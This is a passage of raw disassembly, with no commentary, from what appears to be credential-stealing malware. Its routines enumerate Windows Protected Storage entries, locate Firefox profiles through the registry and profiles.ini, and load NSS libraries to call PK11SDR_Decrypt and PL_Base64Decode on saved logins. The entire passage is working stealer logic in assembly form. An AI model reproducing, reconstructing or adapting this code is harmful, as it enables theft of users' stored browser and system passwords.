jnz loc_416AA6
push dword ptr [ebp-30h]
lea eax, [ebp-614h]
push offset aWs ; "%ws"
push eax
call dword_42F24C ; wsprintfA
add esp, 0Ch
cmp [ebp-10h], esi
mov [ebp-24h], esi
mov [ebp-18h], esi
jnz short loc_4164CF
push 80004003h
call sub_421E08
loc_4164CF: ; CODE XREF: sub_416208+2BB�j
xor eax, eax
lea edx, [ebp-18h]
push eax
push eax
push edx
mov esi, [ebp-10h]
lea edx, [ebp-24h]
push edx
mov ecx, [esi]
push dword ptr [ebp-30h]
lea edx, [ebp-50h]
push edx
lea edx, [ebp-40h]
push edx
push eax
push esi
call dword ptr [ecx+44h]
test eax, eax
jge short loc_416500
push offset dword_43EA94
push esi
push eax
call sub_421E16
loc_416500: ; CODE XREF: sub_416208+2EA�j
push dword ptr [ebp-18h]
call dword_42F0DC ; lstrlenA
mov esi, [ebp-24h]
lea ecx, [esi-1]
cmp eax, ecx
jnb short loc_416547
xor ecx, ecx
xor edx, edx
test esi, esi
jbe short loc_41653D
loc_41651B: ; CODE XREF: sub_416208+333�j
mov eax, [ebp-18h]
mov al, [edx+eax]
test al, al
jnz short loc_41652F
mov byte ptr [ebp+ecx-414h], 2Ch
jmp short loc_416536
; ---------------------------------------------------------------------------
loc_41652F: ; CODE XREF: sub_416208+31B�j
mov [ebp+ecx-414h], al
loc_416536: ; CODE XREF: sub_416208+325�j
inc ecx
inc edx
inc edx
cmp edx, esi
jb short loc_41651B
loc_41653D: ; CODE XREF: sub_416208+311�j
and byte ptr [ebp+ecx-415h], 0
jmp short loc_41655F
; ---------------------------------------------------------------------------
loc_416547: ; CODE XREF: sub_416208+309�j
push dword ptr [ebp-18h]
lea eax, [ebp-414h]
push offset aS_1 ; "%s"
push eax
call dword_42F24C ; wsprintfA
add esp, 0Ch
loc_41655F: ; CODE XREF: sub_416208+33D�j
mov esi, offset byte_44D6A4
lea eax, [ebp-0DFCh]
push esi
push eax
call edi ; dword_42F04C
lea eax, [ebp-814h]
push esi
push eax
call edi ; dword_42F04C
lea eax, [ebp-84h]
push offset a5e7e8100 ; "5e7e8100"
push eax
call dword_42F0A8 ; lstrcmpA
test eax, eax
jnz loc_41664F
lea eax, [ebp-1B0h]
push esi
push eax
call edi ; dword_42F04C
lea eax, [ebp-414h]
push offset asc_4381C4 ; ":"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4165E7
lea eax, [ebp-414h]
push offset asc_4381C4 ; ":"
push eax
call sub_4235C0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call edi ; dword_42F04C
lea eax, [ebp-414h]
push offset asc_4381C4 ; ":"
push eax
call sub_4235C0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_4165E7: ; CODE XREF: sub_416208+3A9�j
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push esi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_416610
lea eax, [ebp-1B0h]
push esi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_416616
loc_416610: ; CODE XREF: sub_416208+3F3�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_41664F
loc_416616: ; CODE XREF: sub_416208+406�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_43EA38
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_416647
call sub_4105DF
jmp short loc_41664C
; ---------------------------------------------------------------------------
loc_416647: ; CODE XREF: sub_416208+436�j
call sub_41066C
loc_41664C: ; CODE XREF: sub_416208+43D�j
add esp, 20h
loc_41664F: ; CODE XREF: sub_416208+384�j
; sub_416208+40C�j
lea eax, [ebp-84h]
push offset aE161255a ; "e161255a"
push eax
call dword_42F0A8 ; lstrcmpA
test eax, eax
jnz loc_4167B6
lea eax, [ebp-614h]
push offset aStringindex ; "StringIndex"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_4167B6
lea eax, [ebp-614h]
push offset dword_43EA18
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4166B1
lea eax, [ebp-614h]
push offset dword_43EA18
push eax
call sub_4235C0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_4166B1: ; CODE XREF: sub_416208+491�j
lea eax, [ebp-614h]
push 8
push eax
lea eax, [ebp-1B0h]
push eax
call dword_42F0D8 ; lstrcpynA
lea eax, [ebp-1B0h]
push offset dword_43EA10
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_4166F9
lea eax, [ebp-1B0h]
push offset dword_43EA08
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz loc_4167B6
loc_4166F9: ; CODE XREF: sub_416208+4D4�j
lea eax, [ebp-1B0h]
push esi
push eax
call edi ; dword_42F04C
lea eax, [ebp-414h]
push offset dword_43EA04
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41674E
lea eax, [ebp-414h]
push offset dword_43EA04
push eax
call sub_4235C0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call edi ; dword_42F04C
lea eax, [ebp-414h]
push offset dword_43EA04
push eax
call sub_4235C0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_41674E: ; CODE XREF: sub_416208+510�j
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push esi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_416777
lea eax, [ebp-1B0h]
push esi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41677D
loc_416777: ; CODE XREF: sub_416208+55A�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_4167B6
loc_41677D: ; CODE XREF: sub_416208+56D�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_43E9E0
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_4167AE
call sub_4105DF
jmp short loc_4167B3
; ---------------------------------------------------------------------------
loc_4167AE: ; CODE XREF: sub_416208+59D�j
call sub_41066C
loc_4167B3: ; CODE XREF: sub_416208+5A4�j
add esp, 20h
loc_4167B6: ; CODE XREF: sub_416208+45B�j
; sub_416208+476�j ...
lea eax, [ebp-84h]
push offset aB9819c52 ; "b9819c52"
push eax
call dword_42F0A8 ; lstrcmpA
test eax, eax
jnz loc_416957
mov eax, [ebp-18h]
xor esi, esi
xor edi, edi
cmp [ebp-24h], esi
jbe short loc_41681F
loc_4167DC: ; CODE XREF: sub_416208+615�j
mov cl, [esi+eax]
test cl, cl
jnz short loc_4167ED
mov byte ptr [ebp+edi-414h], 2Ch
jmp short loc_416817
; ---------------------------------------------------------------------------
loc_4167ED: ; CODE XREF: sub_416208+5D9�j
push ecx
call dword_42F248 ; IsCharAlphaNumericA
test eax, eax
mov eax, [ebp-18h]
jnz short loc_41680D
mov cl, [esi+eax]
cmp cl, 40h
jz short loc_41680D
cmp cl, 2Eh
jz short loc_41680D
cmp cl, 5Fh
jnz short loc_416818
loc_41680D: ; CODE XREF: sub_416208+5F1�j
; sub_416208+5F9�j ...
mov cl, [esi+eax]
mov [ebp+edi-414h], cl
loc_416817: ; CODE XREF: sub_416208+5E3�j
inc edi
loc_416818: ; CODE XREF: sub_416208+603�j
inc esi
inc esi
cmp esi, [ebp-24h]
jb short loc_4167DC
loc_41681F: ; CODE XREF: sub_416208+5D2�j
and byte ptr [ebp+edi-415h], 0
and dword ptr [ebp-1Ch], 0
cmp byte ptr [eax+4], 0
lea esi, [ebp-412h]
jbe loc_416957
mov edi, offset dword_43EA04
loc_416840: ; CODE XREF: sub_416208+749�j
inc esi
lea eax, [ebp-214h]
push esi
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp-214h]
push edi
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_416874
lea eax, [ebp-214h]
push edi
push eax
call sub_4235C0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_416874: ; CODE XREF: sub_416208+658�j
push edi
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41689A
push edi
push esi
call sub_4235C0
pop ecx
inc eax
pop ecx
inc eax
push eax
lea eax, [ebp-0E8h]
push eax
call dword_42F04C ; lstrcpyA
loc_41689A: ; CODE XREF: sub_416208+677�j
lea eax, [ebp-0E8h]
push edi
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4168BF
lea eax, [ebp-0E8h]
push edi
push eax
call sub_4235C0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_4168BF: ; CODE XREF: sub_416208+6A3�j
push edi
push esi
call sub_4235C0
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp-0E8h]
push eax
call dword_42F0DC ; lstrlenA
lea esi, [esi+eax+9]
lea eax, [ebp-0E8h]
push offset byte_44D6A4
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_416909
lea eax, [ebp-214h]
push offset byte_44D6A4
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41690F
loc_416909: ; CODE XREF: sub_416208+6E8�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_416944
loc_41690F: ; CODE XREF: sub_416208+6FF�j
lea eax, [ebp-0E8h]
inc dword ptr [ebp-14h]
push eax
lea eax, [ebp-214h]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_43E9AC
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_41693C
call sub_4105DF
jmp short loc_416941
; ---------------------------------------------------------------------------
loc_41693C: ; CODE XREF: sub_416208+72B�j
call sub_41066C
loc_416941: ; CODE XREF: sub_416208+732�j
add esp, 1Ch
loc_416944: ; CODE XREF: sub_416208+705�j
mov eax, [ebp-18h]
inc dword ptr [ebp-1Ch]
movzx eax, byte ptr [eax+4]
cmp [ebp-1Ch], eax
jl loc_416840
loc_416957: ; CODE XREF: sub_416208+5C2�j
; sub_416208+62D�j
lea eax, [ebp-84h]
push offset a220d5cc1 ; "220d5cc1"
push eax
call dword_42F0A8 ; lstrcmpA
test eax, eax
jnz loc_416A75
xor esi, esi
mov edi, offset byte_44D6A4
cmp dword_45C1D0, esi
jle short loc_4169BE
mov dword ptr [ebp-1Ch], offset byte_45879C
loc_416987: ; CODE XREF: sub_416208+7B4�j
lea eax, [ebp-614h]
push eax
push dword ptr [ebp-1Ch]
call dword_42F0A8 ; lstrcmpA
test eax, eax
jnz short loc_4169AE
lea eax, [ebp-414h]
push edi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4169EF
loc_4169AE: ; CODE XREF: sub_416208+791�j
add dword ptr [ebp-1Ch], 12Ch
inc esi
cmp esi, dword_45C1D0
jl short loc_416987
loc_4169BE: ; CODE XREF: sub_416208+776�j
lea eax, [ebp-414h]
push edi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_416A33
mov eax, esi
push edi
imul eax, 12Ch
mov edi, offset dword_458738
add eax, edi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_416A3E
jmp short loc_416A38
; ---------------------------------------------------------------------------
loc_4169EF: ; CODE XREF: sub_416208+7A4�j
imul esi, 12Ch
lea eax, [ebp-414h]
inc dword ptr [ebp-14h]
push eax
lea eax, dword_458738[esi]
push eax
lea eax, dword_458800[esi]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_43E974
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_416A2C
call sub_4105DF
loc_416A27: ; CODE XREF: sub_416208+829�j
add esp, 20h
jmp short loc_416A75
; ---------------------------------------------------------------------------
loc_416A2C: ; CODE XREF: sub_416208+818�j
call sub_41066C
jmp short loc_416A27
; ---------------------------------------------------------------------------
loc_416A33: ; CODE XREF: sub_416208+7C7�j
mov edi, offset dword_458738
loc_416A38: ; CODE XREF: sub_416208+7E5�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_416A75
loc_416A3E: ; CODE XREF: sub_416208+7E3�j
imul esi, 12Ch
lea eax, [ebp-414h]
add esi, edi
push eax
inc dword ptr [ebp-14h]
push esi
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_43E944
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_416A6D
call sub_4105DF
jmp short loc_416A72
; ---------------------------------------------------------------------------
loc_416A6D: ; CODE XREF: sub_416208+85C�j
call sub_41066C
loc_416A72: ; CODE XREF: sub_416208+863�j
add esp, 1Ch
loc_416A75: ; CODE XREF: sub_416208+763�j
; sub_416208+822�j ...
mov esi, 200h
lea eax, [ebp-614h]
push esi
push 0
push eax
call sub_4221F0
push esi
lea eax, [ebp-414h]
push 0
push eax
call sub_4221F0
mov edi, dword_42F04C
add esp, 18h
jmp loc_416479
; ---------------------------------------------------------------------------
loc_416AA6: ; CODE XREF: sub_416208+294�j
mov eax, [ebp-28h]
mov byte ptr [ebp-4], 2
cmp eax, esi
jz loc_416411
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_416411
; ---------------------------------------------------------------------------
loc_416AC0: ; CODE XREF: sub_416208+22C�j
mov eax, [ebp-2Ch]
mov byte ptr [ebp-4], 1
cmp eax, esi
jz loc_416384
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_416384
; ---------------------------------------------------------------------------
loc_416ADA: ; CODE XREF: sub_416208+19F�j
cmp [ebp-14h], edi
jnz short loc_416B18
cmp [ebp+14h], edi
mov esi, offset aSNoPstoreEntri ; "%s No PStore entries found."
jnz short loc_416B03
cmp [ebp+18h], edi
jnz short loc_416B08
cmp [ebp+1Ch], edi
jz short loc_416B18
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 10h
loc_416B03: ; CODE XREF: sub_416208+8DF�j
cmp [ebp+18h], edi
jz short loc_416B18
loc_416B08: ; CODE XREF: sub_416208+8E4�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_410491
add esp, 10h
loc_416B18: ; CODE XREF: sub_416208+8D5�j
; sub_416208+8E9�j ...
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
cmp eax, edi
jz short loc_416B29
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416B29: ; CODE XREF: sub_416208+919�j
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, edi
jz short loc_416B3A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416B3A: ; CODE XREF: sub_416208+92A�j
xor eax, eax
inc eax
loc_416B3D: ; CODE XREF: sub_416208+172�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn
sub_416208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B4C proc near ; DATA XREF: sub_403B2C+EF0�o
var_1240 = byte ptr -1240h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_188 = dword ptr -188h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1240h
call sub_4220C0
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_240]
rep movsd
xor edi, edi
mov dword ptr [eax+0BCh], 1
cmp [ebp+var_1B8], edi
jz short loc_416B9B
push 1000h
lea eax, [ebp+var_1240]
push [ebp+var_1B8]
push eax
call sub_4222F0
add esp, 0Ch
loc_416B9B: ; CODE XREF: sub_416B4C+33�j
call sub_416C0B
mov esi, eax
call sub_416E02
push eax
call sub_416F48
test eax, eax
pop ecx
jz short loc_416BF6
push offset byte_455AB8
push esi
call sub_4170D5
pop ecx
test eax, eax
pop ecx
jz short loc_416BF6
cmp [ebp+var_1B8], edi
jz short loc_416BD4
lea eax, [ebp+var_1240]
push eax
jmp short loc_416BD5
; ---------------------------------------------------------------------------
loc_416BD4: ; CODE XREF: sub_416B4C+7D�j
push edi
loc_416BD5: ; CODE XREF: sub_416B4C+86�j
push [ebp+var_188]
lea eax, [ebp+var_23C]
push [ebp+var_240]
push eax
push esi
call sub_417149
add esp, 14h
call sub_41740C
loc_416BF6: ; CODE XREF: sub_416B4C+64�j
; sub_416B4C+75�j
push [ebp+var_1BC]
call sub_41C059
pop ecx
push edi
call dword_42F150 ; ExitThread
pop edi
pop esi
sub_416B4C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C0B proc near ; CODE XREF: sub_416B4C:loc_416B9B�p
var_64C = dword ptr -64Ch
var_63D = byte ptr -63Dh
var_63C = byte ptr -63Ch
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_137 = byte ptr -137h
var_34 = byte ptr -34h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 63Ch
mov al, byte_44D6A4
push esi
push edi
push 40h
mov [ebp+var_138], al
pop ecx
xor eax, eax
lea edi, [ebp+var_137]
rep stosd
stosw
stosb
push 8
mov esi, offset aApplicationDat ; "Application Data\\Mozilla\\Firefox"
pop ecx
lea edi, [ebp+var_34]
rep movsd
movsb
lea eax, [ebp+var_C]
xor edi, edi
push eax
push 8
mov [ebp+var_10], 104h
mov [ebp+var_4], edi
call dword_42F040 ; GetCurrentProcess
push eax
call dword_4542F8 ; OpenProcessToken
test eax, eax
jz short loc_416CDC
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_C]
call dword_454334
test eax, eax
jz short loc_416CDC
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_23C]
push eax
call dword_42F04C ; lstrcpyA
mov esi, offset asc_43E8EC ; "\\"
lea eax, [ebp+var_23C]
push esi
push eax
call sub_423270
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_23C]
push eax
call sub_423270
lea eax, [ebp+var_23C]
push offset aProfiles_ini ; "\\profiles.ini"
push eax
call sub_423270
lea eax, [ebp+var_23C]
push offset word_433F2C
push eax
call sub_422F66
add esp, 20h
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_416CE3
loc_416CDC: ; CODE XREF: sub_416C0B+55�j
; sub_416C0B+6D�j
xor eax, eax
jmp loc_416DFE
; ---------------------------------------------------------------------------
loc_416CE3: ; CODE XREF: sub_416C0B+CF�j
push ebx
push eax
mov ebx, 400h
jmp short loc_416D33
; ---------------------------------------------------------------------------
loc_416CEC: ; CODE XREF: sub_416C0B+13A�j
lea eax, [ebp+var_63C]
push eax
call sub_417776
cmp [ebp+var_4], 0
pop ecx
lea eax, [ebp+var_63C]
jnz short loc_416D1F
push offset aNameDefault ; "name=default"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_416D30
mov [ebp+var_4], 1
jmp short loc_416D30
; ---------------------------------------------------------------------------
loc_416D1F: ; CODE XREF: sub_416C0B+F8�j
push offset aPath ; "path="
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_416D4C
loc_416D30: ; CODE XREF: sub_416C0B+109�j
; sub_416C0B+112�j
push [ebp+var_8]
loc_416D33: ; CODE XREF: sub_416C0B+DF�j
lea eax, [ebp+var_63C]
push ebx
push eax
call sub_42458A
add esp, 0Ch
test eax, eax
jnz short loc_416CEC
jmp loc_416DF2
; ---------------------------------------------------------------------------
loc_416D4C: ; CODE XREF: sub_416C0B+123�j
lea eax, [ebp+var_63C]
push offset asc_4381B4 ; "/"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_416D66
mov byte ptr [eax], 5Ch
loc_416D66: ; CODE XREF: sub_416C0B+156�j
lea eax, [ebp+var_63C]
push eax
call sub_422120
and [ebp+eax+var_63D], 0
lea eax, [ebp+var_63C]
mov [esp+64Ch+var_64C], offset asc_438724 ; "="
push eax
call sub_4235C0
mov ebx, eax
push ebx
call sub_422120
mov edi, eax
lea eax, [ebp+var_34]
push eax
call sub_422120
add edi, eax
lea eax, [ebp+var_138]
push eax
call sub_422120
lea eax, [edi+eax+3]
push eax
call sub_422F79
mov edi, eax
add esp, 18h
test edi, edi
jz short loc_416DF2
lea eax, [ebp+var_138]
push eax
push edi
call dword_42F04C ; lstrcpyA
push esi
push edi
call sub_423270
lea eax, [ebp+var_34]
push eax
push edi
call sub_423270
push esi
push edi
call sub_423270
inc ebx
push ebx
push edi
call sub_423270
add esp, 20h
loc_416DF2: ; CODE XREF: sub_416C0B+13C�j
; sub_416C0B+1B4�j
push [ebp+var_8]
call sub_422B65
pop ecx
mov eax, edi
pop ebx
loc_416DFE: ; CODE XREF: sub_416C0B+D3�j
pop edi
pop esi
leave
retn
sub_416C0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E02 proc near ; CODE XREF: sub_416B4C+56�p
var_154 = byte ptr -154h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
push 10h
pop ecx
mov esi, offset aSoftwareClient ; "SOFTWARE\\Clients\\StartMenuInternet\\fire"...
lea edi, [ebp+var_154]
mov al, byte_44D6A4
rep movsd
movsw
push 40h
mov [ebp+var_110], al
pop ecx
xor eax, eax
lea edi, [ebp+var_10F]
xor ebx, ebx
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+var_8], 104h
push eax
push 20019h
lea eax, [ebp+var_154]
push ebx
push eax
push 80000002h
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz loc_416F41
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push [ebp+var_4]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz loc_416F38
cmp [ebp+var_8], ebx
jbe loc_416F38
cmp [ebp+var_110], bl
jz loc_416F38
push [ebp+var_4]
call dword_4542E8 ; RegCloseKey
cmp [ebp+var_110], 22h
jnz short loc_416EE4
lea eax, [ebp+var_110]
xor esi, esi
push eax
call sub_422120
dec eax
pop ecx
jz short loc_416EE4
loc_416EC3: ; CODE XREF: sub_416E02+E0�j
mov al, [ebp+esi+var_10F]
mov [ebp+esi+var_110], al
lea eax, [ebp+var_110]
push eax
inc esi
call sub_422120
dec eax
pop ecx
cmp esi, eax
jb short loc_416EC3
loc_416EE4: ; CODE XREF: sub_416E02+AD�j
; sub_416E02+BF�j
lea eax, [ebp+var_110]
push eax
call sub_422120
pop ecx
jmp short loc_416EFD
; ---------------------------------------------------------------------------
loc_416EF3: ; CODE XREF: sub_416E02+FE�j
cmp [ebp+eax+var_110], 5Ch
jz short loc_416F04
loc_416EFD: ; CODE XREF: sub_416E02+EF�j
dec eax
cmp eax, ebx
jg short loc_416EF3
jmp short loc_416F0B
; ---------------------------------------------------------------------------
loc_416F04: ; CODE XREF: sub_416E02+F9�j
mov [ebp+eax+var_110], bl
loc_416F0B: ; CODE XREF: sub_416E02+100�j
lea eax, [ebp+var_110]
push eax
call sub_422120
inc eax
push eax
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_416F34
lea eax, [ebp+var_110]
push eax
push esi
call dword_42F04C ; lstrcpyA
loc_416F34: ; CODE XREF: sub_416E02+122�j
mov eax, esi
jmp short loc_416F43
; ---------------------------------------------------------------------------
loc_416F38: ; CODE XREF: sub_416E02+82�j
; sub_416E02+8B�j ...
push [ebp+var_4]
call dword_4542E8 ; RegCloseKey
loc_416F41: ; CODE XREF: sub_416E02+60�j
xor eax, eax
loc_416F43: ; CODE XREF: sub_416E02+134�j
pop edi
pop esi
pop ebx
leave
retn
sub_416E02 endp
; =============== S U B R O U T I N E =======================================
sub_416F48 proc near ; CODE XREF: sub_416B4C+5C�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebp, ebp
push edi
cmp esi, ebp
mov dword_45C1DC, ebp
mov dword_45C1D8, ebp
mov edi, offset aPlc4_dll ; "plc4.dll"
mov ebx, offset aNss3_dll ; "nss3.dll"
jz short loc_416FC7
push offset aNspr4_dll ; "nspr4.dll"
push esi
call sub_417441
pop ecx
test eax, eax
pop ecx
jz short loc_416FBF
push edi
push esi
call sub_417441
pop ecx
cmp eax, ebp
pop ecx
mov dword_45C1DC, eax
jz short loc_416FBF
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_417441
pop ecx
test eax, eax
pop ecx
jz short loc_416FBF
push offset aSoftokn3_dll ; "softokn3.dll"
push esi
call sub_417441
pop ecx
test eax, eax
pop ecx
jz short loc_416FBF
push ebx
push esi
call sub_417441
pop ecx
mov dword_45C1D8, eax
pop ecx
loc_416FBF: ; CODE XREF: sub_416F48+33�j
; sub_416F48+45�j ...
cmp dword_45C1D8, ebp
jnz short loc_416FF6
loc_416FC7: ; CODE XREF: sub_416F48+22�j
push ebx
push esi
call sub_417441
push edi
push esi
mov dword_45C1D8, eax
call sub_417441
add esp, 10h
cmp dword_45C1D8, ebp
mov dword_45C1DC, eax
jz loc_4170CE
cmp eax, ebp
jz loc_4170CE
loc_416FF6: ; CODE XREF: sub_416F48+7D�j
mov esi, dword_42F13C
push offset aNss_init ; "NSS_Init"
push dword_45C1D8
call esi ; dword_42F13C
push offset aNss_shutdown ; "NSS_Shutdown"
mov dword_455AB0, eax
push dword_45C1D8
call esi ; dword_42F13C
push offset aPk11_getintern ; "PK11_GetInternalKeySlot"
mov dword_455F24, eax
push dword_45C1D8
call esi ; dword_42F13C
push offset aPk11_freeslot ; "PK11_FreeSlot"
mov dword_455F2C, eax
push dword_45C1D8
call esi ; dword_42F13C
push offset aPk11_authentic ; "PK11_Authenticate"
mov dword_455EC8, eax
push dword_45C1D8
call esi ; dword_42F13C
push offset aPk11sdr_decryp ; "PK11SDR_Decrypt"
mov dword_455F28, eax
push dword_45C1D8
call esi ; dword_42F13C
push offset aPk11_checkuser ; "PK11_CheckUserPassword"
mov dword_455ED0, eax
push dword_45C1D8
call esi ; dword_42F13C
cmp dword_455AB0, ebp
mov dword_455EC4, eax
jz short loc_4170C9
cmp dword_455F24, ebp
jz short loc_4170C9
cmp dword_455F2C, ebp
jz short loc_4170C9
cmp dword_455F28, ebp
jz short loc_4170C9
cmp dword_455ED0, ebp
jz short loc_4170C9
cmp dword_455EC8, ebp
jz short loc_4170C9
cmp eax, ebp
jz short loc_4170C9
push offset aPl_base64decod ; "PL_Base64Decode"
push dword_45C1DC
call esi ; dword_42F13C
cmp eax, ebp
mov dword_455EBC, eax
jz short loc_4170C9
xor eax, eax
inc eax
jmp short loc_4170D0
; ---------------------------------------------------------------------------
loc_4170C9: ; CODE XREF: sub_416F48+138�j
; sub_416F48+140�j ...
call sub_41740C
loc_4170CE: ; CODE XREF: sub_416F48+A0�j
; sub_416F48+A8�j
xor eax, eax
loc_4170D0: ; CODE XREF: sub_416F48+17F�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_416F48 endp
; =============== S U B R O U T I N E =======================================
sub_4170D5 proc near ; CODE XREF: sub_416B4C+6C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
and dword_45C1D4, 0
push ebx
push esi
push [esp+8+arg_0]
call dword_455AB0
test eax, eax
pop ecx
jnz short loc_41713A
mov ebx, [esp+8+arg_4]
mov dword_45C1D4, 1
test ebx, ebx
mov esi, offset byte_455AB8
jz short loc_417127
push ebx
call sub_422120
cmp eax, 3FFh
pop ecx
ja short loc_41713A
push ebx
call sub_422120
test eax, eax
pop ecx
jbe short loc_417127
push ebx
push esi
call dword_42F04C ; lstrcpyA
jmp short loc_41712E
; ---------------------------------------------------------------------------
loc_417127: ; CODE XREF: sub_4170D5+2D�j
; sub_4170D5+46�j
and byte_455AB8, 0
loc_41712E: ; CODE XREF: sub_4170D5+50�j
push esi
call sub_4174BE
cmp eax, 1
pop ecx
jz short loc_417143
loc_41713A: ; CODE XREF: sub_4170D5+16�j
; sub_4170D5+3B�j
call sub_41740C
xor eax, eax
jmp short loc_417146
; ---------------------------------------------------------------------------
loc_417143: ; CODE XREF: sub_4170D5+63�j
xor eax, eax
inc eax
loc_417146: ; CODE XREF: sub_4170D5+6C�j
pop esi
pop ebx
retn
sub_4170D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417149 proc near ; CODE XREF: sub_416B4C+9D�p
var_5128 = byte ptr -5128h
var_2928 = byte ptr -2928h
var_2927 = byte ptr -2927h
var_128 = byte ptr -128h
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 5128h
call sub_4220C0
push ebx
push esi
push edi
mov esi, offset dword_43ECA0
lea edi, [ebp+var_18]
push [ebp+arg_0]
movsd
movsd
movsd
movsb
mov esi, offset dword_43EC90
lea edi, [ebp+var_28]
movsd
movsd
and [ebp+var_8], 0
xor ebx, ebx
movsd
inc ebx
movsw
mov [ebp+var_4], ebx
call sub_422120
add eax, 41h
push eax
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_417407
